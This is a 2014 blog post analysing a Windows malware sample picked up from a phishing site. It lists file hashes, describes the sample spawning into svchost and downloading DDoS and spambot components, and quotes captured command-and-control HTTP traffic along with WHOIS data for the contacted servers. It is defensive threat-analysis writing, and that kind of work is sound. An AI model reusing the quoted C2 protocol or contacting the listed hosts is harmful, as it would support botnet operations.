More generic malware

I discovered this junk while browsing around phishing sites.. www.serenitydrive.com

SHA256: 76e8fb0cc8c1953730bce96f5761c3fca9cf44e54cd9fa93dae361d9f9d239eb
File name: Label_GB_Manchester.exe
Virustotal Report
Malwr Report

When run it spawns another process of itself in a hijacked svchost and then contacts 62.112.157.126 on TCP port 8080.
The IP resolves to “server.edv-p.net”
POST /index.php HTTP/1.1
inetnum: 62.112.157.124 – 62.112.157.127
netname: HOSTT-65-NET
descr: Hosttech
descr: Haslaub
descr: 8824 Schoenenberg
country: CH

It seemed to download another file from there.
SHA256 27f340a21502a24d4745c693bfa411238c563300ea3d23dc4f6ae96cc974ad0e
Virustotal Report
Malwr Report

This file seems to be focused on DDoS against a few music video sites (as far as I could work out from the names).

It also downloaded an SMTP spambot..
SHA256 18fbf7039433d3e464a4fd55e8536fefc22f99e52478a8f96b631f63707327c8
Virustotal Report
Malwr Report

I also saw it upload and download CDATA.BIN and CKEY.BIN files from 72.51.46.206 (“homebase.ksoftware.net”) on port 8080:

POST /cb/board.pl HTTP/1.1
Host: 72.51.46.206:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 471

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="CKEY"

.......O7`H....,h*x....E.1........A.s.9.Y..A......b..........t.j>...1.P.......{2f{W.@.(~Aq.&..K..C...x.s.q..&..}...E..ymSwY.s.s/
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="CDATA"

.m2.../...jkx.7..!..O.#.....!z..pX.7.4..$v.....b....h.\....V..!XeN....B.%..DJ..v<(=.....T766 .....gd...(@J3../..i.*a.i$..J.e.5.8&UH..|....1....`..{.........q?)..|.y....{..9k
--1BEF0A57BE110FD467A--
HTTP/1.1 200 OK
Server: nginx/1.5.6
Date: Sat, 25 Oct 2014 21:29:41 GMT
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"
Content-Length: 520
Connection: close

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="CDATA"; filename="CDATA.BIN"
Content-Type: application/octet-stream

.m2.../.......7..e..]'.R..fC.z.j..=7.....R>S......Z9..~Q{.>...H.........a..#."....ts.)-...6.K.."F....n.--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="CKEY"; filename="CKEY.BIN"
Content-Type: application/octet-stream

I.GqM.w.K.....1...4.R..D..5b...[.{.[|.......Y.]
.
..!....E.o(..[`/.....R"5.79.b...n.3.....-..........+mR...F..|BC... ..._H....g.--1BEF0A57BE110FD467A--

The IP is owned by ServerBeach:
Net Range 72.51.32.0 – 72.51.47.255
CIDR 72.51.32.0/20
Name PEER1-SERVERBEACH-06A
Handle NET-72-51-32-0-1
Parent PEER1-BLK-08 (NET-72-51-0-0-1)
Net Type Reallocated
Origin AS AS13768
Organization ServerBeach (SERVE-32)

I also saw it communicate similar CKEY and CDATA posts to 74.52.192.186 (“ba.c0.344a.static.theplanet.com”) on port 8080 using the same URL as above.
Net Range 74.52.0.0 – 74.55.255.255
CIDR 74.52.0.0/14
Name NETBLK-THEPLANET-BLK-14
Handle NET-74-52-0-0-1
Parent NET74 (NET-74-0-0-0-0)
Organization ThePlanet.com Internet Services, Inc. (TPCM)

For both those last two servers there is a slight misconfiguration. If you visit the folder without a / on the end the webserver on port 8080 tries to forward you to a full URL which it attempts to be the same IP but with port 4440. This might link it to some other malware campaign but Google isn’t returning anything interesting at this point.

Malwr also saw traffic to this host.
Malwr also saw initial infection traffic to 70.32.75.58 (“www.tokyo22.com”) on port 8080 getting the file /index.php
Net Range 70.32.64.0 – 70.32.127.255
CIDR 70.32.64.0/18
Name MEDIATEMPLE-106
Handle NET-70-32-64-0-1
Parent NET70 (NET-70-0-0-0-0)
Net Type Direct Allocation
Origin AS
Organization Media Temple, Inc. (MEDIAT-10)

Advertisements
This entry was posted in Uncategorized. Bookmark the permalink.

Comment on this topic

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s